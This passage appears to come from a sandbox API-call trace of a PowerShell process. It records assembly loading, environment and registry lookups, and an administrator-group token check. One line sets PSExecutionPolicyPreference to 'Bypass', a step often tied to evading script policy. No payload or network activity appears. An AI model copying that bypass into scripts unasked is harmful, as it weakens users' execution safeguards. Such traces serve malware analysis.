	[0133.284] bsearch (_Key=0x25ace0, _Base=0x642ff4a1d90, _NumOfElements=0xcc, _SizeOfElements=0x18, _PtFuncCompare=0x642ff4a337c) returned 0x642ff4a2498
	[0133.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0133.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0133.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0133.484] CoTaskMemAlloc (cb=0x104) returned 0x3f5ed0
	[0133.484] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f5ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0133.484] CoTaskMemFree (pv=0x3f5ed0) 
	[0133.487] CoTaskMemAlloc (cb=0x104) returned 0x3f5ed0
	[0133.487] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f5ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0133.487] CoTaskMemFree (pv=0x3f5ed0) 
	[0133.487] CoTaskMemAlloc (cb=0x104) returned 0x3f5ed0
	[0133.487] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f5ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0133.487] CoTaskMemFree (pv=0x3f5ed0) 
	[0133.489] CoCreateGuid (in: pguid=0x25dac8 | out: pguid=0x25dac8*(Data1=0x746f2e00, Data2=0x87c7, Data3=0x4a20, Data4=([0]=0x84, [1]=0x86, [2]=0x11, [3]=0xe0, [4]=0x7, [5]=0x2b, [6]=0x3, [7]=0x5e))) returned 0x0
	[0133.493] CoTaskMemAlloc (cb=0x104) returned 0x3f5ed0
	[0133.493] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f5ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0133.493] CoTaskMemFree (pv=0x3f5ed0) 
	[0133.495] CoTaskMemAlloc (cb=0x104) returned 0x3f5ed0
	[0133.495] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f5ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0133.496] CoTaskMemFree (pv=0x3f5ed0) 
	[0133.498] CoTaskMemAlloc (cb=0x104) returned 0x3f5ed0
	[0133.498] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f5ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0133.498] CoTaskMemFree (pv=0x3f5ed0) 
	[0133.503] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0133.504] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x25d770 | out: lpConsoleScreenBufferInfo=0x25d770) returned 1
	[0133.509] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0133.509] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x25d770 | out: lpConsoleScreenBufferInfo=0x25d770) returned 1
	[0133.510] GetVersionExW (in: lpVersionInformation=0x25d700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x25d700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0133.512] GetCurrentProcess () returned 0xffffffffffffffff
	[0133.513] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x25d798 | out: TokenHandle=0x25d798*=0x324) returned 1
	[0133.516] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x25d6b8 | out: TokenInformation=0x0, ReturnLength=0x25d6b8) returned 0
	[0133.517] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4038b0
	[0133.517] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x4038b0, TokenInformationLength=0x4, ReturnLength=0x25d6b8 | out: TokenInformation=0x4038b0, ReturnLength=0x25d6b8) returned 1
	[0133.520] DuplicateTokenEx (in: hExistingToken=0x324, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x25d818 | out: phNewToken=0x25d818*=0x320) returned 1
	[0133.521] CheckTokenMembership (in: TokenHandle=0x320, SidToCheck=0x2e349b8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x25d828 | out: IsMember=0x25d828) returned 1
	[0133.521] CloseHandle (hObject=0x320) returned 1
	[0134.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0134.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0134.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0134.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0134.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0134.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0134.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0134.413] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0134.413] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0134.413] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0136.678] GetConsoleWindow () returned 0xb0184
	[0136.703] SetEnvironmentVariableW (lpName="PSExecutionPolicyPreference", lpValue="Bypass") returned 1
	[0136.729] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x320
	[0136.741] CoCreateGuid (in: pguid=0x25d910 | out: pguid=0x25d910*(Data1=0xf595496b, Data2=0xeb46, Data3=0x42d2, Data4=([0]=0xbd, [1]=0x88, [2]=0xef, [3]=0xcc, [4]=0xdb, [5]=0x7e, [6]=0x1, [7]=0x4b))) returned 0x0
	[0136.750] CoTaskMemAlloc (cb=0x104) returned 0x3f5ed0
	[0136.750] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f5ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0136.750] CoTaskMemFree (pv=0x3f5ed0) 
	[0141.863] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25cd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.863] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.863] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25cd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25cd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25cd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.867] CoTaskMemAlloc (cb=0x104) returned 0x3f5ed0
	[0141.867] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x3f5ed0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0141.867] CoTaskMemFree (pv=0x3f5ed0) 
	[0141.869] CoTaskMemAlloc (cb=0xcc) returned 0x1b96ac80
	[0141.869] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b96ac80, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0141.869] CoTaskMemFree (pv=0x1b96ac80) 
	[0141.869] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x25d488 | out: phkResult=0x25d488*=0x328) returned 0x0
	[0141.869] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x25d40c, lpData=0x0, lpcbData=0x25d408*=0x0 | out: lpType=0x25d40c*=0x2, lpData=0x0, lpcbData=0x25d408*=0x6c) returned 0x0
	[0141.869] CoTaskMemAlloc (cb=0x70) returned 0x439150
	[0141.869] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x25d3dc, lpData=0x439150, lpcbData=0x25d3d8*=0x6c | out: lpType=0x25d3dc*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x25d3d8*=0x6c) returned 0x0
	[0141.869] CoTaskMemFree (pv=0x439150) 
	[0141.869] CoTaskMemAlloc (cb=0xcc) returned 0x1b96ac80
	[0141.869] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b96ac80, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0141.870] CoTaskMemFree (pv=0x1b96ac80) 
	[0141.870] CoTaskMemAlloc (cb=0xcc) returned 0x1b96ac80
	[0141.870] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b96ac80, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0141.870] CoTaskMemFree (pv=0x1b96ac80) 
	[0141.873] RegCloseKey (hKey=0x328) returned 0x0
	[0141.873] CoTaskMemAlloc (cb=0xcc) returned 0x1b96ac80
	[0141.873] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b96ac80, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0141.873] CoTaskMemFree (pv=0x1b96ac80) 
	[0141.873] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x25d488 | out: phkResult=0x25d488*=0x328) returned 0x0
	[0141.873] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x25d40c, lpData=0x0, lpcbData=0x25d408*=0x0 | out: lpType=0x25d40c*=0x0, lpData=0x0, lpcbData=0x25d408*=0x0) returned 0x2
	[0141.873] RegCloseKey (hKey=0x328) returned 0x0
	[0145.962] CoTaskMemAlloc (cb=0x20c) returned 0x1b962560
	[0145.962] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b962560 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0
	[0146.503] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334
	[0146.504] GetFileType (hFile=0x334) returned 0x1
	[0146.504] SetErrorMode (uMode=0x1) returned 0x1
	[0146.504] GetFileType (hFile=0x334) returned 0x1
	[0146.509] ReadFile (in: hFile=0x334, lpBuffer=0x2ebbae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25d088, lpOverlapped=0x0 | out: lpBuffer=0x2ebbae8*, lpNumberOfBytesRead=0x25d088*=0x1000, lpOverlapped=0x0) returned 1
	[0146.512] ReadFile (in: hFile=0x334, lpBuffer=0x2ebbae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25d088, lpOverlapped=0x0 | out: lpBuffer=0x2ebbae8*, lpNumberOfBytesRead=0x25d088*=0x1000, lpOverlapped=0x0) returned 1
	[0146.512] ReadFile (in: hFile=0x334, lpBuffer=0x2ebbae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25d088, lpOverlapped=0x0 | out: lpBuffer=0x2ebbae8*, lpNumberOfBytesRead=0x25d088*=0x1000, lpOverlapped=0x0) returned 1
	[0146.527] ReadFile (in: hFile=0x334, lpBuffer=0x2ebbae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25d088, lpOverlapped=0x0 | out: lpBuffer=0x2ebbae8*, lpNumberOfBytesRead=0x25d088*=0xcf3, lpOverlapped=0x0) returned 1
	[0146.528] ReadFile (in: hFile=0x334, lpBuffer=0x2ebaf43, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x25d088, lpOverlapped=0x0 | out: lpBuffer=0x2ebaf43*, lpNumberOfBytesRead=0x25d088*=0x0, lpOverlapped=0x0) returned 1
	[0146.528] ReadFile (in: hFile=0x334, lpBuffer=0x2ebbae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25d088, lpOverlapped=0x0 | out: lpBuffer=0x2ebbae8*, lpNumberOfBytesRead=0x25d088*=0x0, lpOverlapped=0x0) returned 1
	[0146.530] CloseHandle (hObject=0x334) returned 1
	[0148.333] GetSystemInfo (in: lpSystemInfo=0x25bd20 | out: lpSystemInfo=0x25bd20*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0148.334] VirtualQuery (in: lpAddress=0x25bdd0, lpBuffer=0x25cc90, dwLength=0x30 | out: lpBuffer=0x25cc90*(BaseAddress=0x25b000, AllocationBase=0x1e0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0154.516] VirtualQuery (in: lpAddress=0x25bdd0, lpBuffer=0x25cc90, dwLength=0x30 | out: lpBuffer=0x25cc90*(BaseAddress=0x25b000, AllocationBase=0x1e0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0157.007] VirtualQuery (in: lpAddress=0x25bdd0, lpBuffer=0x25cc90, dwLength=0x30 | out: lpBuffer=0x25cc90*(BaseAddress=0x25b000, AllocationBase=0x1e0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0157.020] VirtualQuery (in: lpAddress=0x25bdd0, lpBuffer=0x25cc90, dwLength=0x30 | out: lpBuffer=0x25cc90*(BaseAddress=0x25b000, AllocationBase=0x1e0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0157.021] VirtualQuery (in: lpAddress=0x25bdd0, lpBuffer=0x25cc90, dwLength=0x30 | out: lpBuffer=0x25cc90*(BaseAddress=0x25b000, AllocationBase=0x1e0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0159.253] VirtualQuery (in: lpAddress=0x25bdd0, lpBuffer=0x25cc90, dwLength=0x30 | out: lpBuffer=0x25cc90*(BaseAddress=0x25b000, AllocationBase=0x1e0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0159.255] VirtualQuery (in: lpAddress=0x25bdd0, lpBuffer=0x25cc90, dwLength=0x30 | out: lpBuffer=0x25cc90*(BaseAddress=0x25b000, AllocationBase=0x1e0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0159.256] VirtualQuery (in: lpAddress=0x25bdd0, lpBuffer=0x25cc90, dwLength=0x30 | out: lpBuffer=0x25cc90*(BaseAddress=0x25b000, AllocationBase=0x1e0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0159.262] CoTaskMemAlloc (cb=0x104) returned 0x3f5ed0
	[0159.262] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f5ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0159.262] CoTaskMemFree (pv=0x3f5ed0) 
	[0159.962] CoTaskMemAlloc (cb=0x104) returned 0x3f5ed0
	[0159.962] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f5ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0159.975] CoTaskMemAlloc (cb=0x104) returned 0x3f5ed0
	[0159.975] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f5ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0159.977] CoTaskMemAlloc (cb=0x104) returned 0x3f5ed0
	[0159.977] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f5ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0159.980] CoTaskMemAlloc (cb=0x104) returned 0x3f5ed0
	[0159.980] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f5ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0159.980] CoTaskMemFree (pv=0x3f5ed0) 
	[0159.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x25c870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0159.981] SetErrorMode (uMode=0x1) returned 0x1
	[0159.981] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c4
	[0160.000] GetFileType (hFile=0x1c4) returned 0x1
	[0160.000] SetErrorMode (uMode=0x1) returned 0x1
	[0160.000] GetFileType (hFile=0x1c4) returned 0x1
